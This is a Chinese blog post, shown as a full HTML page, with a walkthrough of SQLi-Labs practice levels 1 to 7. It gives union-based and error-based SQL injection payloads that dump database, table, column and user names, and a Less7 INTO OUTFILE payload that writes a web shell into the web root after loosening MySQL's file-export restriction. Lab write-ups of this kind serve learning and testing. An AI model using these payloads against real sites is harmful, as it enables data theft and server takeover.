<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/slice-fill1.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/slice-fill.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.5.0',
    exturl: false,
    sidebar: {"position":"left","width":280,"display":"post","offset":10,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":true},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: true,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":8},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: 'search.xml',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="前言SQLi-Labs是某印度程序猿开发的一套练习SQL注入的靶场，共计65关。难度从浅入深，涉及多种sql注入方法 原项目地址：https://github.com/Audi-1/sqli-labs 本篇将逐步上传已经完成关卡的攻略过程，以及更新未完成的攻略。">
<meta name="keywords" content="Web,靶场练习,sql注入,Web渗透">
<meta property="og:type" content="article">
<meta property="og:title" content="SQLi-Labs过关笔记">
<meta property="og:url" content="https://github.com/GgBoom-993/blog/2019/11/17/SQLi-Labs/index.html">
<meta property="og:site_name" content="GgBoom993&#39;s Blog">
<meta property="og:description" content="前言SQLi-Labs是某印度程序猿开发的一套练习SQL注入的靶场，共计65关。难度从浅入深，涉及多种sql注入方法 原项目地址：https://github.com/Audi-1/sqli-labs 本篇将逐步上传已经完成关卡的攻略过程，以及更新未完成的攻略。">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg1.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg2.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg3.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg4.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg5.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg6.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg7.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg8.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg9.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg10.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg11.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg12.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg13.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg14.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg15.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg16.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg17.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg18.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg19.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg20.PNG">
<meta property="og:image" content="https://github.com/2019/11/17/SQLi-Labs/timg21.PNG">
<meta property="og:updated_time" content="2020-06-30T10:10:20.938Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQLi-Labs过关笔记">
<meta name="twitter:description" content="前言SQLi-Labs是某印度程序猿开发的一套练习SQL注入的靶场，共计65关。难度从浅入深，涉及多种sql注入方法 原项目地址：https://github.com/Audi-1/sqli-labs 本篇将逐步上传已经完成关卡的攻略过程，以及更新未完成的攻略。">
<meta name="twitter:image" content="https://github.com/2019/11/17/SQLi-Labs/timg1.PNG">

<link rel="canonical" href="https://github.com/GgBoom-993/blog/2019/11/17/SQLi-Labs/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>SQLi-Labs过关笔记 | GgBoom993's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">GgBoom993's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
        <li class="menu-item menu-item-书单">

    <a href="/book/" rel="section"><i class="fa fa-fw fa-book"></i>书单</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="none"
           placeholder="搜索..." spellcheck="false"
           type="text" id="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://github.com/GgBoom-993/blog/2019/11/17/SQLi-Labs/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/timg1.jpg">
      <meta itemprop="name" content="GgBoom993">
      <meta itemprop="description" content="无名小卒">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="GgBoom993's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SQLi-Labs过关笔记
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-11-17 15:41:02" itemprop="dateCreated datePublished" datetime="2019-11-17T15:41:02+08:00">2019-11-17</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-06-30 18:10:20" itemprop="dateModified" datetime="2020-06-30T18:10:20+08:00">2020-06-30</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/学习笔记/" itemprop="url" rel="index">
                    <span itemprop="name">学习笔记</span>
                  </a>
                </span>
            </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>2.5k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>2 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>SQLi-Labs是某印度程序猿开发的一套练习SQL注入的靶场，共计65关。难度从浅入深，涉及多种sql注入方法</p>
<p>原项目地址：<a href="https://github.com/Audi-1/sqli-labs">https://github.com/Audi-1/sqli-labs</a></p>
<p>本篇将逐步上传已经完成关卡的攻略过程，以及更新未完成的攻略。</p>
<a id="more"></a>

<h1 id="Less1-Less10"><a href="#Less1-Less10" class="headerlink" title="Less1-Less10"></a>Less1-Less10</h1><h2 id="Less1"><a href="#Less1" class="headerlink" title="Less1"></a>Less1</h2><p>1、首先已经判断出是 ‘ 闭合，order by判断字段数，从下图可见 3正确4错误 </p>
<p>-1’order by 3–+</p>
<img src="/2019/11/17/SQLi-Labs/timg1.PNG">
<img src="/2019/11/17/SQLi-Labs/timg2.PNG">

<p>2、接下来联合查询看回显，得到数据库和用户</p>
<p>-1’ union select 1,databse(),user()–+</p>
<img src="/2019/11/17/SQLi-Labs/timg3.PNG">

<p>3、爆表名</p>
<p>-1’ union select 1,2,table_name from information_schema.tables<br>where table_schema=database()–+</p>
<img src="/2019/11/17/SQLi-Labs/timg4.PNG">

<p>4、爆出users中的列名</p>
<p>-1’ union select 1,2,column_name from information_schema.columns<br>where table_name=’users’–+</p>
<img src="/2019/11/17/SQLi-Labs/timg5.PNG">

<p>5、爆出username，同理可爆出password，less1结束</p>
<img src="/2019/11/17/SQLi-Labs/timg6.PNG">


<h2 id="Less2"><a href="#Less2" class="headerlink" title="Less2"></a>Less2</h2><p>1、判断闭合，发现加入单引号或双引号提示数据库语句错误，最后确定是没有闭合的常规数字型注入</p>
<img src="/2019/11/17/SQLi-Labs/timg7.PNG">

<p>2、之后的过程同less1一样，不再重复描述，less2结束</p>
<h2 id="Less3"><a href="#Less3" class="headerlink" title="Less3"></a>Less3</h2><p>1、判断闭合，加入单引号，发现报错。 可以通过报错判断出，是 ‘) 闭合</p>
<img src="/2019/11/17/SQLi-Labs/timg8.PNG">

<p>2、看回显，没问题，之后的过程同less1一样，不再重复描述，less3结束</p>
<img src="/2019/11/17/SQLi-Labs/timg9.PNG">

<h2 id="Less4"><a href="#Less4" class="headerlink" title="Less4"></a>Less4</h2><p>1、闭合，加入’发现没有报错，加入”报错，通过报错可以判断，是”）闭合判断</p>
<img src="/2019/11/17/SQLi-Labs/timg10.PNG">

<p>2、看回显，没问题，之后过程同less1一样，不再重复描述，less4结束</p>
<img src="/2019/11/17/SQLi-Labs/timg11.PNG">

<h2 id="Less5"><a href="#Less5" class="headerlink" title="Less5"></a>Less5</h2><p>1、判断闭合，加入’发现报错，加入”没有报错，接着”and1=2–+ 发现没报错,-1”union select 1,2,3 –+无回显，所以猜测使用报错注入</p>
<img src="/2019/11/17/SQLi-Labs/timg12.PNG">

<p>常用报错注入有三种：floor报错，updatexml报错，extractvalue报错<br>这里使用floor报错 ‘ 闭合</p>
<p>2、爆库</p>
<p>通过调整limit达到遍历的效果，找到需要的库<br>?id=-1’union select 1,2,count(* ) from information_schema.tables where table_schema=database() group by concat(0x7e,(select schema_name from information_schema.schemata limit 8,1),0x7e,floor(rand(0)*2))–+</p>
<img src="/2019/11/17/SQLi-Labs/timg13.PNG">

<p>3、爆表</p>
<p>同理可调整limit遍历出需要的表users<br>?id=-1’union select 1,2,count(* ) from information_schema.tables where table_schema=database() group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e,floor(rand(0)*2))–+</p>
<img src="/2019/11/17/SQLi-Labs/timg14.PNG">


<p>4、爆列</p>
<p>调整limit遍历出 id,username,password<br>?id=-1’union select 1,2,count(* ) from information_schema.tables where table_schema=database() group by concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=’users’ limit 2,1),0x7e,floor(rand(0)*2))–+</p>
<img src="/2019/11/17/SQLi-Labs/timg15.PNG">

<p>5、爆数据</p>
<p>调整列名以及limit遍历出对应列下面的数据<br>?id=-1’union select 1,2,count(* ) from information_schema.tables where table_schema=database()  group by concat(0x7e,(select username from users limit 1,1),0x7e,floor(rand(0)*2))–+</p>
<p>less5结束</p>
<img src="/2019/11/17/SQLi-Labs/timg16.PNG">

<h2 id="Less6"><a href="#Less6" class="headerlink" title="Less6"></a>Less6</h2><p>根据主页less6的名称可以知道是 “ 闭合，剩下步骤同less5，不再描述，less6结束</p>
<img src="/2019/11/17/SQLi-Labs/timg17.PNG">

<h2 id="Less7"><a href="#Less7" class="headerlink" title="Less7"></a>Less7</h2><p>less7的标题是这样描述的 dump into outfile 提示我们写入外部文件<br>需要利用数据库的into outfile 命令</p>
<p>1、通过尝试发现是 ‘))闭合，然后用以下命令写入文件，并加入一句话</p>
<p>?id=-1’))  union select 1,”此处放入一句话”,3 into outfile “D:\phpStudy\PHPTutorial\WWW\less7.php” –+</p>
<img src="/2019/11/17/SQLi-Labs/timg18.PNG">

<p>完成后因为条件允许，所以可以去本地目录验证一下</p>
<img src="/2019/11/17/SQLi-Labs/timg19.PNG">

<p>很好，可以看见这里没有写入的less7.php，找一找问题出在哪里。检查语法，检查mysql，都没有问题。估计是权限的问题，然后经过一番询问和百度，找到了原因。在mysql配置文件my.ini下有一个参数，secure-file-priv。由于启动mysql的时候使用了secure-file-priv这个参数，这个参数的主要目的就是限制LOAD DATA INFILE或者SELECT INTO OUTFILE之类文件的目录位置。我的my.ini中没有找到这个参数，不要紧，手动添加secure-file-priv = “”</p>
<pre><code>其中当参数 secure_file_priv 为空时，对导入导出无限制
当值为一个指定的目录时，只能向指定的目录导入导出
当值被设置为NULL时，禁止导入导出功能</code></pre><p>关于mysqlsecure-file-priv权限的详细解答：<br><a href="https://blog.csdn.net/bnxf00000/article/details/64123549" target="_blank" rel="noopener">https://blog.csdn.net/bnxf00000/article/details/64123549</a></p>
<p>2、重启mysql,重新写入并验证,成功</p>
<img src="/2019/11/17/SQLi-Labs/timg20.PNG">

<p>3、上菜刀连接</p>
<p>结果如图，less7结束</p>
<img src="/2019/11/17/SQLi-Labs/timg21.PNG">

<h2 id="Less8"><a href="#Less8" class="headerlink" title="Less8"></a>Less8</h2>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Web/" rel="tag"><i class="fa fa-tag"></i>Web</a>
              <a href="/tags/靶场练习/" rel="tag"><i class="fa fa-tag"></i>靶场练习</a>
              <a href="/tags/sql注入/" rel="tag"><i class="fa fa-tag"></i>sql注入</a>
              <a href="/tags/Web渗透/" rel="tag"><i class="fa fa-tag"></i>Web渗透</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
                <a href="/2019/11/13/尘/" rel="next" title="尘">
                  <i class="fa fa-chevron-left"></i> 尘
                </a>
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
                <a href="/2019/11/18/hexo主题个人优化/" rel="prev" title="hexo主题个人优化">
                  hexo主题个人优化 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Less1-Less10"><span class="nav-number">2.</span> <span class="nav-text">Less1-Less10</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Less1"><span class="nav-number">2.1.</span> <span class="nav-text">Less1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less2"><span class="nav-number">2.2.</span> <span class="nav-text">Less2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less3"><span class="nav-number">2.3.</span> <span class="nav-text">Less3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less4"><span class="nav-number">2.4.</span> <span class="nav-text">Less4</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less5"><span class="nav-number">2.5.</span> <span class="nav-text">Less5</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less6"><span class="nav-number">2.6.</span> <span class="nav-text">Less6</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less7"><span class="nav-number">2.7.</span> <span class="nav-text">Less7</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less8"><span class="nav-number">2.8.</span> <span class="nav-text">Less8</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="GgBoom993"
      src="/images/timg1.jpg">
  <p class="site-author-name" itemprop="name">GgBoom993</p>
  <div class="site-description" itemprop="description">无名小卒</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">35</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/GgBoom-993" title="GitHub → https://github.com/GgBoom-993"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">GgBoom993</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">83k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">1:16</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.5.0
  </div>
-->


<!-- 在网页底部添加网站运行时间 -->
<span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span>
<script>
    var now = new Date();
    function createtime() {
        var grt= new Date("09/30/2019 00:00:00");//此处修改你的建站时间或者网站上线时间
        now.setTime(now.getTime()+250);
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days);
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours);
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;}
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;}
        document.getElementById("timeDate").innerHTML = "网站已运行 "+dnum+" 天 ";
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒";
    }
setInterval("createtime()",250);
</script>





        












        
      </div>
    </footer>
  </div>

  
  
  <script color='255,255,224' opacity='1' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>



  




  <script src="/js/local-search.js"></script>













  

  

</body>
</html>
